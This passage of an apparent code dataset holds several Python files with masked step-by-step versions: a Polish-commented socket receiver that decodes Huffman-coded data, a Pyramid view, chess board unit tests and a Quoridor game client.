sock.bind((ip, int(port)))
sock.listen()
conn, addr = sock.accept()
print('Połączono:', addr)
rec_data = recvall(conn) #Odbierz dane
rec_dict = create_dict(rec_data) #Utwórz słownik z danych
extracted = data_to_extract(rec_data, rec_dict) #Na podstawie słownika, odkoduj tekst
print("ODEBRANY SLOWNIK\n")
print(rec_dict)
print(extracted)
f = open(codedpath, "wb") #Zapis otrzymanych danych
f.write(rec_data)
f.close()
f = open(decodedpath, "w")
f.write(extracted)
f.close()
return 0
|
normal
|
{
"blob_id": "aa13278a4686e9bab7948c2f212f87f9bd6eee00",
"index": 969,
"step-1": "<mask token>\n\n\ndef recvall(sock):\n BUFF_SIZE = 4096\n data = b''\n while True:\n part = sock.recv(BUFF_SIZE)\n data += part\n if len(part) < BUFF_SIZE:\n break\n return data\n\n\n<mask token>\n\n\ndef extract_start(data):\n i = 0\n while True:\n if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0\n ]:\n return i + 3\n i += 1\n\n\ndef bytes_to_bits(data, begin):\n bits = ''\n for i in range(begin, len(data)):\n bits += format(data[i], '08b')\n return bits\n\n\ndef data_to_extract(data, dict):\n begin = extract_start(data)\n print(begin)\n data = bytes_to_bits(data, begin)\n dict = {y: x for x, y in dict.items()}\n text = ''\n temp_code = ''\n for i in range(len(data)):\n temp_code += data[i]\n if temp_code in dict:\n text += dict[temp_code]\n temp_code = ''\n return text\n\n\ndef recieve_data(codedpath, decodedpath, ip, port):\n port = int(port)\n sock = socket.socket()\n sock.bind((ip, int(port)))\n sock.listen()\n conn, addr = sock.accept()\n print('Połączono:', addr)\n rec_data = recvall(conn)\n rec_dict = create_dict(rec_data)\n extracted = data_to_extract(rec_data, rec_dict)\n print('ODEBRANY SLOWNIK\\n')\n print(rec_dict)\n print(extracted)\n f = open(codedpath, 'wb')\n f.write(rec_data)\n f.close()\n f = open(decodedpath, 'w')\n f.write(extracted)\n f.close()\n return 0\n",
"step-2": "<mask token>\n\n\ndef recvall(sock):\n BUFF_SIZE = 4096\n data = b''\n while True:\n part = sock.recv(BUFF_SIZE)\n data += part\n if len(part) < BUFF_SIZE:\n break\n return data\n\n\ndef create_dict(data):\n dict = {}\n i = 0\n while True:\n dict[chr(data[i])] = ''\n j = 1\n while data[i + j] != END[0]:\n dict[chr(data[i])] += str(chr(data[i + j]))\n j += 1\n i += 1 + j\n if data[i] == END[0] and data[i + 1] == END[0]:\n break\n return dict\n\n\ndef extract_start(data):\n i = 0\n while True:\n if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0\n ]:\n return i + 3\n i += 1\n\n\ndef bytes_to_bits(data, begin):\n bits = ''\n for i in range(begin, len(data)):\n bits += format(data[i], '08b')\n return bits\n\n\ndef data_to_extract(data, dict):\n begin = extract_start(data)\n print(begin)\n data = bytes_to_bits(data, begin)\n dict = {y: x for x, y in dict.items()}\n text = ''\n temp_code = ''\n for i in range(len(data)):\n temp_code += data[i]\n if temp_code in dict:\n text += dict[temp_code]\n temp_code = ''\n return text\n\n\ndef recieve_data(codedpath, decodedpath, ip, port):\n port = int(port)\n sock = socket.socket()\n sock.bind((ip, int(port)))\n sock.listen()\n conn, addr = sock.accept()\n print('Połączono:', addr)\n rec_data = recvall(conn)\n rec_dict = create_dict(rec_data)\n extracted = data_to_extract(rec_data, rec_dict)\n print('ODEBRANY SLOWNIK\\n')\n print(rec_dict)\n print(extracted)\n f = open(codedpath, 'wb')\n f.write(rec_data)\n f.close()\n f = open(decodedpath, 'w')\n f.write(extracted)\n f.close()\n return 0\n",
"step-3": "<mask token>\nEND = bytearray()\nEND.append(255)\nprint(END[0])\n\n\ndef recvall(sock):\n BUFF_SIZE = 4096\n data = b''\n while True:\n part = sock.recv(BUFF_SIZE)\n data += part\n if len(part) < BUFF_SIZE:\n break\n return data\n\n\ndef create_dict(data):\n dict = {}\n i = 0\n while True:\n dict[chr(data[i])] = ''\n j = 1\n while data[i + j] != END[0]:\n dict[chr(data[i])] += str(chr(data[i + j]))\n j += 1\n i += 1 + j\n if data[i] == END[0] and data[i + 1] == END[0]:\n break\n return dict\n\n\ndef extract_start(data):\n i = 0\n while True:\n if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0\n ]:\n return i + 3\n i += 1\n\n\ndef bytes_to_bits(data, begin):\n bits = ''\n for i in range(begin, len(data)):\n bits += format(data[i], '08b')\n return bits\n\n\ndef data_to_extract(data, dict):\n begin = extract_start(data)\n print(begin)\n data = bytes_to_bits(data, begin)\n dict = {y: x for x, y in dict.items()}\n text = ''\n temp_code = ''\n for i in range(len(data)):\n temp_code += data[i]\n if temp_code in dict:\n text += dict[temp_code]\n temp_code = ''\n return text\n\n\ndef recieve_data(codedpath, decodedpath, ip, port):\n port = int(port)\n sock = socket.socket()\n sock.bind((ip, int(port)))\n sock.listen()\n conn, addr = sock.accept()\n print('Połączono:', addr)\n rec_data = recvall(conn)\n rec_dict = create_dict(rec_data)\n extracted = data_to_extract(rec_data, rec_dict)\n print('ODEBRANY SLOWNIK\\n')\n print(rec_dict)\n print(extracted)\n f = open(codedpath, 'wb')\n f.write(rec_data)\n f.close()\n f = open(decodedpath, 'w')\n f.write(extracted)\n f.close()\n return 0\n",
"step-4": "import socket\nEND = bytearray()\nEND.append(255)\nprint(END[0])\n\n\ndef recvall(sock):\n BUFF_SIZE = 4096\n data = b''\n while True:\n part = sock.recv(BUFF_SIZE)\n data += part\n if len(part) < BUFF_SIZE:\n break\n return data\n\n\ndef create_dict(data):\n dict = {}\n i = 0\n while True:\n dict[chr(data[i])] = ''\n j = 1\n while data[i + j] != END[0]:\n dict[chr(data[i])] += str(chr(data[i + j]))\n j += 1\n i += 1 + j\n if data[i] == END[0] and data[i + 1] == END[0]:\n break\n return dict\n\n\ndef extract_start(data):\n i = 0\n while True:\n if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0\n ]:\n return i + 3\n i += 1\n\n\ndef bytes_to_bits(data, begin):\n bits = ''\n for i in range(begin, len(data)):\n bits += format(data[i], '08b')\n return bits\n\n\ndef data_to_extract(data, dict):\n begin = extract_start(data)\n print(begin)\n data = bytes_to_bits(data, begin)\n dict = {y: x for x, y in dict.items()}\n text = ''\n temp_code = ''\n for i in range(len(data)):\n temp_code += data[i]\n if temp_code in dict:\n text += dict[temp_code]\n temp_code = ''\n return text\n\n\ndef recieve_data(codedpath, decodedpath, ip, port):\n port = int(port)\n sock = socket.socket()\n sock.bind((ip, int(port)))\n sock.listen()\n conn, addr = sock.accept()\n print('Połączono:', addr)\n rec_data = recvall(conn)\n rec_dict = create_dict(rec_data)\n extracted = data_to_extract(rec_data, rec_dict)\n print('ODEBRANY SLOWNIK\\n')\n print(rec_dict)\n print(extracted)\n f = open(codedpath, 'wb')\n f.write(rec_data)\n f.close()\n f = open(decodedpath, 'w')\n f.write(extracted)\n f.close()\n return 0\n",
"step-5": "import socket\n\nEND = bytearray()\nEND.append(255)\nprint(END[0])\n\n\ndef recvall(sock): # Odbiór danych\n BUFF_SIZE = 4096 # 4 KiB\n data = b''\n while True: # odbieramy dane, pakiety 4KiB\n part = sock.recv(BUFF_SIZE)\n data += part\n if len(part) < BUFF_SIZE:\n # 0 lub koniec danych\n break\n return data\n\n\ndef create_dict(data): # Odczytuje otrzymany słownik\n dict = {}\n i = 0\n while True:\n dict[chr(data[i])] = ''\n j = 1\n while data[i + j] != END[0]: # Dopóki nie znajdzie FF, uznaje bajty za 'kod' slowa\n dict[chr(data[i])] += str(chr(data[i + j]))\n j += 1\n\n i += 1 + j\n if data[i] == END[0] and data[i + 1] == END[0]: # Gdy znajdzie 3x FF, kończy słownik\n break\n return dict\n\n\ndef extract_start(data): # Poszukuje pącztka segmentu danych\n i = 0\n while True:\n if data[i] == END[0] and data[i + 1] == END[0] and data[i + 2] == END[0]:\n return i + 3\n i += 1\n\n\ndef bytes_to_bits(data, begin): # Zamienia bajty na znakowy odpowiednik w bitach\n bits = ''\n for i in range(begin, len(data)):\n bits += format(data[i], \"08b\")\n return bits\n\n\ndef data_to_extract(data, dict): # Otrzymane dane na podstawie slownika odczytuje do tekstu\n begin = extract_start(data) # Szukamy początku tekstu\n print(begin)\n data = bytes_to_bits(data, begin)\n dict = {y: x for x, y in dict.items()} # Zamiana kluczy z wartością w słowniku\n text = ''\n temp_code = ''\n for i in range(len(data)): # Dla kazdego bitu\n temp_code += data[i]\n if temp_code in dict: # Szukamy czy utworzona tymczasowo zmienna nie zawiera się\n # w słowniku\n text += dict[temp_code]\n temp_code = ''\n return text\n\n\ndef recieve_data(codedpath, decodedpath, ip, port):\n port = int(port) #Segment odpowiedzialny za utworzenie połaczenia przy użyciu gniazda\n sock = socket.socket()\n sock.bind((ip, int(port)))\n sock.listen()\n conn, addr = sock.accept()\n print('Połączono:', addr)\n rec_data = recvall(conn) #Odbierz dane\n rec_dict = create_dict(rec_data) #Utwórz słownik z danych\n 
extracted = data_to_extract(rec_data, rec_dict) #Na podstawie słownika, odkoduj tekst\n\n print(\"ODEBRANY SLOWNIK\\n\")\n print(rec_dict)\n print(extracted)\n\n f = open(codedpath, \"wb\") #Zapis otrzymanych danych\n f.write(rec_data)\n f.close()\n f = open(decodedpath, \"w\")\n f.write(extracted)\n f.close()\n return 0\n",
"step-ids": [
5,
6,
8,
9,
10
]
}
|
[
5,
6,
8,
9,
10
] |
from pyramid.view import view_config, view_defaults
from ecoreleve_server.core.base_view import CRUDCommonView
from .individual_resource import IndividualResource, IndividualsResource, IndividualLocationsResource
@view_defaults(context=IndividualResource)
class IndividualView(CRUDCommonView):
@view_config(name='equipment', request_method='GET', renderer='json',
permission='read')
def getEquipment(self):
return self.context.getEquipment()
|
normal
|
{
"blob_id": "a3cfd507e30cf232f351fbc66d347aaca99a0447",
"index": 4059,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@view_defaults(context=IndividualResource)\nclass IndividualView(CRUDCommonView):\n <mask token>\n",
"step-3": "<mask token>\n\n\n@view_defaults(context=IndividualResource)\nclass IndividualView(CRUDCommonView):\n\n @view_config(name='equipment', request_method='GET', renderer='json',\n permission='read')\n def getEquipment(self):\n return self.context.getEquipment()\n",
"step-4": "from pyramid.view import view_config, view_defaults\nfrom ecoreleve_server.core.base_view import CRUDCommonView\nfrom .individual_resource import IndividualResource, IndividualsResource, IndividualLocationsResource\n\n\n@view_defaults(context=IndividualResource)\nclass IndividualView(CRUDCommonView):\n\n @view_config(name='equipment', request_method='GET', renderer='json',\n permission='read')\n def getEquipment(self):\n return self.context.getEquipment()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
../pyline/pyline.py
|
normal
|
{
"blob_id": "3fe98c865632c75c0ba0e1357379590f072bf662",
"index": 7840,
"step-1": "../pyline/pyline.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import pytest
from chess.board import Board, ImpossibleMove
from chess.pieces import King, Rook, Pawn, Knight
def test_board_has_32_pieces():
board = Board()
assert board.pieces_quantity() == 32
def test_board_can_be_instatiated_with_any_set_of_pieces():
board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})
assert board.pieces_quantity() == 2
def test_piece_cant_capture_an_ally():
board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})
with pytest.raises(ImpossibleMove):
board.move('f3', 'e5')
def test_alternating_between_players():
board = Board()
assert board.turn == 'white'
board.move('g2', 'g3') # white pawn moves
assert board.turn == 'black'
board.move('b7', 'b6') # black pawn moves
assert board.turn == 'white'
board.move('f1', 'g2') # white bishop moves
assert board.turn == 'black'
def test_only_white_pieces_can_start():
board = Board()
assert board.turn == 'white'
with pytest.raises(ImpossibleMove):
board.move('b7', 'b6')
def test_players_can_put_opponent_in_check():
board = Board({'e1': King('black'), 'f8': Rook('white')})
assert board.check is None
board.move('f8', 'e8')
assert board.check == 'black'
def test_players_can_get_out_of_check():
board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King('white')})
assert board.check is None
board.move('f8', 'e8')
assert board.check == 'black'
board.move('e1', 'f1')
assert board.check is None
def test_player_should_to_get_out_of_check():
board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King('white')})
assert board.check is None
board.move('f8', 'e8')
assert board.check == 'black'
with pytest.raises(ImpossibleMove):
board.move('e1', 'e2')
def test_pieces_can_capture_opponent_pieces():
board = Board(initial_pieces={'a8': King('black'), 'e5': Pawn('black'), 'f3': Knight('white')})
assert board.pieces_quantity() == 3
knight = board.get_piece('f3')
board.move('f3', 'e5')
assert board.get_piece('e5') is knight
assert board.pieces_quantity() == 2
|
normal
|
{
"blob_id": "5f471fb75b1c4f6fc7aa4cb4f99f9c1a1a9f0ea1",
"index": 8595,
"step-1": "<mask token>\n\n\ndef test_board_can_be_instatiated_with_any_set_of_pieces():\n board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})\n assert board.pieces_quantity() == 2\n\n\ndef test_piece_cant_capture_an_ally():\n board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})\n with pytest.raises(ImpossibleMove):\n board.move('f3', 'e5')\n\n\n<mask token>\n\n\ndef test_pieces_can_capture_opponent_pieces():\n board = Board(initial_pieces={'a8': King('black'), 'e5': Pawn('black'),\n 'f3': Knight('white')})\n assert board.pieces_quantity() == 3\n knight = board.get_piece('f3')\n board.move('f3', 'e5')\n assert board.get_piece('e5') is knight\n assert board.pieces_quantity() == 2\n",
"step-2": "<mask token>\n\n\ndef test_board_has_32_pieces():\n board = Board()\n assert board.pieces_quantity() == 32\n\n\ndef test_board_can_be_instatiated_with_any_set_of_pieces():\n board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})\n assert board.pieces_quantity() == 2\n\n\ndef test_piece_cant_capture_an_ally():\n board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})\n with pytest.raises(ImpossibleMove):\n board.move('f3', 'e5')\n\n\n<mask token>\n\n\ndef test_players_can_put_opponent_in_check():\n board = Board({'e1': King('black'), 'f8': Rook('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n\n\ndef test_players_can_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n board.move('e1', 'f1')\n assert board.check is None\n\n\ndef test_player_should_to_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n with pytest.raises(ImpossibleMove):\n board.move('e1', 'e2')\n\n\ndef test_pieces_can_capture_opponent_pieces():\n board = Board(initial_pieces={'a8': King('black'), 'e5': Pawn('black'),\n 'f3': Knight('white')})\n assert board.pieces_quantity() == 3\n knight = board.get_piece('f3')\n board.move('f3', 'e5')\n assert board.get_piece('e5') is knight\n assert board.pieces_quantity() == 2\n",
"step-3": "<mask token>\n\n\ndef test_board_has_32_pieces():\n board = Board()\n assert board.pieces_quantity() == 32\n\n\ndef test_board_can_be_instatiated_with_any_set_of_pieces():\n board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})\n assert board.pieces_quantity() == 2\n\n\ndef test_piece_cant_capture_an_ally():\n board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})\n with pytest.raises(ImpossibleMove):\n board.move('f3', 'e5')\n\n\ndef test_alternating_between_players():\n board = Board()\n assert board.turn == 'white'\n board.move('g2', 'g3')\n assert board.turn == 'black'\n board.move('b7', 'b6')\n assert board.turn == 'white'\n board.move('f1', 'g2')\n assert board.turn == 'black'\n\n\ndef test_only_white_pieces_can_start():\n board = Board()\n assert board.turn == 'white'\n with pytest.raises(ImpossibleMove):\n board.move('b7', 'b6')\n\n\ndef test_players_can_put_opponent_in_check():\n board = Board({'e1': King('black'), 'f8': Rook('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n\n\ndef test_players_can_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n board.move('e1', 'f1')\n assert board.check is None\n\n\ndef test_player_should_to_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n with pytest.raises(ImpossibleMove):\n board.move('e1', 'e2')\n\n\ndef test_pieces_can_capture_opponent_pieces():\n board = Board(initial_pieces={'a8': King('black'), 'e5': Pawn('black'),\n 'f3': Knight('white')})\n assert board.pieces_quantity() == 3\n knight = board.get_piece('f3')\n board.move('f3', 'e5')\n assert board.get_piece('e5') is knight\n assert board.pieces_quantity() == 2\n",
"step-4": "import pytest\nfrom chess.board import Board, ImpossibleMove\nfrom chess.pieces import King, Rook, Pawn, Knight\n\n\ndef test_board_has_32_pieces():\n board = Board()\n assert board.pieces_quantity() == 32\n\n\ndef test_board_can_be_instatiated_with_any_set_of_pieces():\n board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})\n assert board.pieces_quantity() == 2\n\n\ndef test_piece_cant_capture_an_ally():\n board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})\n with pytest.raises(ImpossibleMove):\n board.move('f3', 'e5')\n\n\ndef test_alternating_between_players():\n board = Board()\n assert board.turn == 'white'\n board.move('g2', 'g3')\n assert board.turn == 'black'\n board.move('b7', 'b6')\n assert board.turn == 'white'\n board.move('f1', 'g2')\n assert board.turn == 'black'\n\n\ndef test_only_white_pieces_can_start():\n board = Board()\n assert board.turn == 'white'\n with pytest.raises(ImpossibleMove):\n board.move('b7', 'b6')\n\n\ndef test_players_can_put_opponent_in_check():\n board = Board({'e1': King('black'), 'f8': Rook('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n\n\ndef test_players_can_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n board.move('e1', 'f1')\n assert board.check is None\n\n\ndef test_player_should_to_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King(\n 'white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n with pytest.raises(ImpossibleMove):\n board.move('e1', 'e2')\n\n\ndef test_pieces_can_capture_opponent_pieces():\n board = Board(initial_pieces={'a8': King('black'), 'e5': Pawn('black'),\n 'f3': Knight('white')})\n assert board.pieces_quantity() == 3\n knight = board.get_piece('f3')\n board.move('f3', 'e5')\n 
assert board.get_piece('e5') is knight\n assert board.pieces_quantity() == 2\n",
"step-5": "import pytest\n\nfrom chess.board import Board, ImpossibleMove\nfrom chess.pieces import King, Rook, Pawn, Knight\n\n\ndef test_board_has_32_pieces():\n board = Board()\n assert board.pieces_quantity() == 32\n\n\ndef test_board_can_be_instatiated_with_any_set_of_pieces():\n board = Board(initial_pieces={'a2': Pawn('white'), 'a6': Pawn('black')})\n assert board.pieces_quantity() == 2\n\n\ndef test_piece_cant_capture_an_ally():\n board = Board(initial_pieces={'e5': Pawn('white'), 'f3': Knight('white')})\n with pytest.raises(ImpossibleMove):\n board.move('f3', 'e5')\n\n\ndef test_alternating_between_players():\n board = Board()\n assert board.turn == 'white'\n board.move('g2', 'g3') # white pawn moves\n assert board.turn == 'black'\n board.move('b7', 'b6') # black pawn moves\n assert board.turn == 'white'\n board.move('f1', 'g2') # white bishop moves\n assert board.turn == 'black'\n\n\ndef test_only_white_pieces_can_start():\n board = Board()\n assert board.turn == 'white'\n with pytest.raises(ImpossibleMove):\n board.move('b7', 'b6')\n\n\ndef test_players_can_put_opponent_in_check():\n board = Board({'e1': King('black'), 'f8': Rook('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n\n\ndef test_players_can_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n board.move('e1', 'f1')\n assert board.check is None\n\n\ndef test_player_should_to_get_out_of_check():\n board = Board({'e1': King('black'), 'f8': Rook('white'), 'a1': King('white')})\n assert board.check is None\n board.move('f8', 'e8')\n assert board.check == 'black'\n with pytest.raises(ImpossibleMove):\n board.move('e1', 'e2')\n\n\ndef test_pieces_can_capture_opponent_pieces():\n board = Board(initial_pieces={'a8': King('black'), 'e5': Pawn('black'), 'f3': Knight('white')})\n assert board.pieces_quantity() == 3\n\n 
knight = board.get_piece('f3')\n board.move('f3', 'e5')\n assert board.get_piece('e5') is knight\n assert board.pieces_quantity() == 2\n",
"step-ids": [
3,
7,
9,
10,
11
]
}
|
[
3,
7,
9,
10,
11
] |
'''Module main'''
import argparse
import api
import quoridor
import quoridorx
def analyser_commande():
'''Analyseur de ligne de commande.'''
parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')
parser.add_argument("idul", help="IDUL du joueur.")
parser.add_argument("-l", '--lister', action='store_true',
help="Lister les identifiants de vos 20 dernières parties.")
# -a
parser.add_argument("-a", '--automatique', action='store_true',
help="Activer le mode automatique.")
# -x
parser.add_argument("-x", '--graphique', action='store_true',
help="Activer le mode graphique.")
return parser.parse_args()
if __name__ == "__main__":
COMMANDE = analyser_commande()
if COMMANDE.lister:
print(api.lister_parties(COMMANDE.idul))
# Mode automatique avec graphique (commande : python main.py -ax idul)
elif COMMANDE.automatique and COMMANDE.graphique:
DEBUTER = api.débuter_partie(COMMANDE.idul)
JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])
ID_PARTIE = DEBUTER[0]
JEU.afficher()
GAGNANT = True
while GAGNANT:
try:
COUP = JEU.jouer_coup(1)
JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])
JEU.liste_joueurs = JOUER['joueurs']
JEU.liste_murs = JOUER['murs']
JEU.afficher()
except StopIteration as err:
GAGNANT = False
print(f'Le gagnant est: {err}')
except RuntimeError as err:
print(err)
# Mode automatique (commande : python main.py -a idul)
elif COMMANDE.automatique:
DEBUTER = api.débuter_partie(COMMANDE.idul)
JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])
ID_PARTIE = DEBUTER[0]
print(JEU)
GAGNANT = True
while GAGNANT:
try:
COUP = JEU.jouer_coup(1)
JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])
JEU.liste_joueurs = JOUER['joueurs']
JEU.liste_murs = JOUER['murs']
print(JEU)
except StopIteration as err:
GAGNANT = False
print(f'Le gagnant est: {err}')
except RuntimeError as err:
print(err)
# Mode manuel avec graphique (commande : python main.py -x idul)
elif COMMANDE.graphique:
DEBUTER = api.débuter_partie(COMMANDE.idul)
JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])
ID_PARTIE = DEBUTER[0]
JEU.afficher()
GAGNANT = True
while GAGNANT:
OK_CHOIX = True
while OK_CHOIX:
CHOIX_COUP = input('Choisir votre coup("D","MH", "MV"): ')
POS = input('Entrer les coordonnées (x,y): ')
try:
JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)
OK_CHOIX = False
JEU.liste_joueurs = JOUER['joueurs']
JEU.liste_murs = JOUER['murs']
JEU.afficher()
except StopIteration as err:
OK_CHOIX = False
GAGNANT = False
print(f'Le gagnant est: {err}')
except RuntimeError as err:
print(err)
# Mode manuel contre le serveur (commande : python main.py idul)
else:
DEBUTER = api.débuter_partie(COMMANDE.idul)
JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])
ID_PARTIE = DEBUTER[0]
print(JEU)
GAGNANT = True
while GAGNANT:
OK_CHOIX = True
while OK_CHOIX:
CHOIX_COUP = input('Choisir votre coup("D","MH", "MV"): ')
POS = input('Entrer les coordonnées (x,y): ')
try:
JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)
OK_CHOIX = False
JEU.liste_joueurs = JOUER['joueurs']
JEU.liste_murs = JOUER['murs']
print(JEU)
except StopIteration as err:
OK_CHOIX = False
GAGNANT = False
print(f'Le gagnant est: {err}')
except RuntimeError as err:
print(err)
|
normal
|
{
"blob_id": "f69544a9123f1738cd7d21c1b4fc02dd73fb9d1b",
"index": 6008,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef analyser_commande():\n \"\"\"Analyseur de ligne de commande.\"\"\"\n parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')\n parser.add_argument('idul', help='IDUL du joueur.')\n parser.add_argument('-l', '--lister', action='store_true', help=\n 'Lister les identifiants de vos 20 dernières parties.')\n parser.add_argument('-a', '--automatique', action='store_true', help=\n 'Activer le mode automatique.')\n parser.add_argument('-x', '--graphique', action='store_true', help=\n 'Activer le mode graphique.')\n return parser.parse_args()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef analyser_commande():\n \"\"\"Analyseur de ligne de commande.\"\"\"\n parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')\n parser.add_argument('idul', help='IDUL du joueur.')\n parser.add_argument('-l', '--lister', action='store_true', help=\n 'Lister les identifiants de vos 20 dernières parties.')\n parser.add_argument('-a', '--automatique', action='store_true', help=\n 'Activer le mode automatique.')\n parser.add_argument('-x', '--graphique', action='store_true', help=\n 'Activer le mode graphique.')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n COMMANDE = analyser_commande()\n if COMMANDE.lister:\n print(api.lister_parties(COMMANDE.idul))\n elif COMMANDE.automatique and COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n JEU.afficher()\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n JEU.afficher()\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n elif COMMANDE.automatique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n print(JEU)\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n print(JEU)\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n elif COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n JEU.afficher()\n GAGNANT = True\n while 
GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n OK_CHOIX = False\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n JEU.afficher()\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n else:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n print(JEU)\n GAGNANT = True\n while GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n OK_CHOIX = False\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n print(JEU)\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n",
"step-4": "<mask token>\nimport argparse\nimport api\nimport quoridor\nimport quoridorx\n\n\ndef analyser_commande():\n \"\"\"Analyseur de ligne de commande.\"\"\"\n parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')\n parser.add_argument('idul', help='IDUL du joueur.')\n parser.add_argument('-l', '--lister', action='store_true', help=\n 'Lister les identifiants de vos 20 dernières parties.')\n parser.add_argument('-a', '--automatique', action='store_true', help=\n 'Activer le mode automatique.')\n parser.add_argument('-x', '--graphique', action='store_true', help=\n 'Activer le mode graphique.')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n COMMANDE = analyser_commande()\n if COMMANDE.lister:\n print(api.lister_parties(COMMANDE.idul))\n elif COMMANDE.automatique and COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n JEU.afficher()\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n JEU.liste_joueurs = JOUER['joueurs']\n 